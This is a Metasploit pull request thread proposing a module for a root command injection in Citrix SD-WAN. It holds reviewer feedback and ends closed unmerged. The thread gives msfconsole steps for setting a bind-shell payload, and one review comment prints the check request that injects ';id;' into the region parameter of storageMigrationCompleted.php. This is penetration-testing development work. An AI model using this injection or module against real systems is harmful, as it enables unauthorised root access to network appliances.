Add Citrix Command Injection module
rapid7/metasploit-framework pull request #11177
Opened 2018-12-26 10:15 UTC by neoleksov

This module exploits an arbitrary command execution vulnerability in Citrix SD-WAN.
This vulnerability can allow an attacker execute arbitrary command with root privileges.
An attacker gained access to the operating system can escalate his privileges to the root's privileges using "sudo -i" command.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use unix/webapp/citrix_command_injection`
- [ ]  `set payload cmd/unix/bind_awk`
- [ ]  `set RHOSTS <r_host>`
- [ ]  `set RPORT <r_port>`
- [ ]  `set SSL <true/false>`
- [ ]  `set LHOST <l_host>`
- [ ]  `set LPORT <l_port>`
- [ ]  `check`
- [ ] **Verify** that the host is vulnerable.
- [ ]  `run`
- [ ] **Verify** that the module open socket with bash session on `l_host:l_port`.

2018-12-27 06:55 UTC, Green-m commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +      if res.code == 200 and /uid=/ =~ res.body
You do not need to catch it by yourself, the `send_request_cgi` method would catch the `::Rex::ConnectionError` exception and return `nil`. Moreover, the `fail_with` is invaild in `check` method.
Here is my suggestion:
```
unless res
  print_bad("Could not connect to the web service")
  Exploit::CheckCode::Unknown
end

if res.code == 200 && /uid=/ =~ res.body
  Exploit::CheckCode::Vulnerable
else
  Exploit::CheckCode::Safe
end
```

2018-12-27 06:55 UTC, Green-m commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +    rescue ::Rex::ConnectionError
See comment above.

2018-12-28 03:15 UTC, bcoles commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +      if res.code == 200 and /uid=/ =~ res.body
For a `check` method, the `vprint_*` methods should be used rather than `print_*.

Also the arguments for the regex check should be reversed.

```ruby
  def check
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'storageMigrationCompleted.php'),
      'vars_get' => {
        'region' => ';id;'
      }
    )

    unless res
      vprint_bad("Could not connect to the web service")
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /uid=/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end
```

2018-12-28 03:18 UTC, bcoles reviewed
It should be pretty easy to add support for a command stager to this module, by wrapping the `send_request_cgi` method call in a `execute_command` method.

2018-12-28 03:18 UTC, bcoles commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +# This module requires Metasploit: http://metasploit.com/download
```suggestion
# This module requires Metasploit: https://metasploit.com/download
```

2018-12-28 03:18 UTC, bcoles commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +          ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17445'],
This URL is made redundant by the `CVE` line above.

Consider adding these instead:

```suggestion
          ['BID', '105711'],
          ['URL', 'https://support.citrix.com/article/CTX236992']
```

2018-12-28 03:18 UTC, bcoles commented on modules/exploits/unix/webapp/citrix_command_injection.rb
> +      ], self.class
`self.class` is redundant here.

```suggestion
      ]
```

2019-01-03 05:24 UTC, wvu requested changes
Since this is a vulnerability in Citrix **SD-WAN**, consider renaming the module to match. Citrix makes a lot of products.

2019-01-09 15:31 UTC, jrobles-r7 commented
Hello. I tried a few downloads from [citrix](https://www.citrix.com/downloads/citrix-sd-wan/) but I wasn't able to get this module to work. Could you provide a link to a specific download that is known to work? Preferably an ova.

Please add module documentation as well.

2019-01-16 16:34 UTC, wvu approved these changes

2019-01-16 16:50 UTC, jrobles-r7 commented
@neoleksov do you still have access to a vulnerable instance? If you do please send a pcap of the module working to msfdev [at] metasploit com.

Also, please add [module documentation](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md).

2019-02-01 20:05 UTC, wchen-r7 commented
Hi everyone, it seems we are unable to verify this exploit from our end, and we haven't been able to get a hold of the author. I'd like to go ahead put this PR in the attic for now, and then when there is momentum again, let's bring it back. Thank you all!

2019-02-01 20:05 UTC, closed without merging